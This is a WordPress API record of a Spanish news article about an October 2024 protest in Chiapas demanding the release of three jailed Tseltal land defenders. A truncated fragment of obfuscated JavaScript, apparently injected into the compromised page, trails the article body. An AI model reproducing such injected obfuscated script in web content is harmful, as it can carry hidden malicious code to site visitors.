{"id":18358,"date":"2024-10-15T02:07:29","date_gmt":"2024-10-15T02:07:29","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=18358"},"modified":"2024-10-15T02:07:30","modified_gmt":"2024-10-15T02:07:30","slug":"protesta-por-la-libertad-de-defensores-indigenas-en-chiapas","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=18358","title":{"rendered":"Protesta por la libertad de defensores ind\u00edgenas en Chiapas"},"content":{"rendered":"\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" data-id=\"18359\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/10\/IMG-20241014-WA0436-1024x768.jpg\" alt=\"\" class=\"wp-image-18359\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/10\/IMG-20241014-WA0436-1024x768.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/10\/IMG-20241014-WA0436-300x225.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/10\/IMG-20241014-WA0436-768x576.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/10\/IMG-20241014-WA0436-1536x1152.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/10\/IMG-20241014-WA0436.jpg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez\/ Corresponsal<\/p>\n\n\n\n<p>14 de octubre del 2024. San Crist\u00f3bal de Las Casas.- En el marco de la jornada de lucha por el D\u00eda de la Resistencia Ind\u00edgena, cientos de personas provenientes de las ca\u00f1adas de la selva de Chil\u00f3n se manifestaron frente al Juzgado de Control y Tribunal de Enjuiciamiento, a las fueras del Centro Estatal de Reinserci\u00f3n Social para Sentenciados (Cerss) n\u00famero 5. Los manifestantes exigieron el fin de la criminalizaci\u00f3n de los defensores del territorio y la liberaci\u00f3n de tres presos pol\u00edticos tseltales: Juan Carlos Guill\u00e9n Moreno, Francisca Silvano Saragoz y Marcos D\u00edaz Hern\u00e1ndez.<\/p>\n\n\n\n<p>Durante la manifestaci\u00f3n, dijeron que Juan Carlos Guill\u00e9n Moreno, campesino ind\u00edgena tseltal y miembro activo del Frente Popular Revolucionario (FPR), fue detenido el 9 de octubre de 2024 mientras acompa\u00f1aba a su padre a una audiencia en el Tribunal Unitario Agrario. &#8220;Su arresto es visto por las comunidades ind\u00edgenas como una represalia por su participaci\u00f3n en el Movimiento en Defensa de la Vida y el Territorio (Modevite), donde protestaba contra la militarizaci\u00f3n en su regi\u00f3n. Guill\u00e9n ya hab\u00eda sido objeto de represi\u00f3n en 2020 por manifestarse pac\u00edficamente contra la construcci\u00f3n de un cuartel de la Guardia Nacional en Bachaj\u00f3n&#8221;.<\/p>\n\n\n\n<p>La situaci\u00f3n de Francisca Silvano Saragoz y Marcos D\u00edaz Hern\u00e1ndez es similar. Ambos est\u00e1n presos en los Centros Estatales de Reinserci\u00f3n Social (CERSS) 5 y 16 respectivamente, acusados \u200b\u200bde delitos que, seg\u00fan los manifestantes, fueron fabricados para despojar a sus comunidades de tierras.<\/p>\n\n\n\n<p>En el caso de Marcos D\u00edaz, se denuncia adem\u00e1s un traslado ilegal a otra prisi\u00f3n, donde ha sido sometido a tratos degradantes y est\u00e1 actualmente incomunicado. Las familias de los presos y sus compa\u00f1eros de lucha subrayan que las acusaciones carecen de pruebas y que los detenidos han sido v\u00edctimas de tortura, lo cual violar\u00eda sus derechos humanos y justifica la necesidad de revisar sus casos. Exigen que la Mesa de Reconciliaci\u00f3n del gobierno intervenga para otorgarles la libertad inmediata.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/ Corresponsal 14 de octubre del 2024. San Crist\u00f3bal de Las Casas.- En el marco de la jornada de lucha por el D\u00eda de la Resistencia Ind\u00edgena, cientos de personas provenientes de las ca\u00f1adas de la selva de Chil\u00f3n se manifestaron frente al Juzgado de Control y Tribunal de Enjuiciamiento, a las fueras del &hellip;<\/p>\n","protected":false},"author":2,"featured_media":18359,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-18358","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/18358","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=18358"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/18358\/revisions"}],"predecessor-version":[{"id":18360,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/18358\/revisions\/18360"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/18359"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=18358"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=18358"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=18358"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}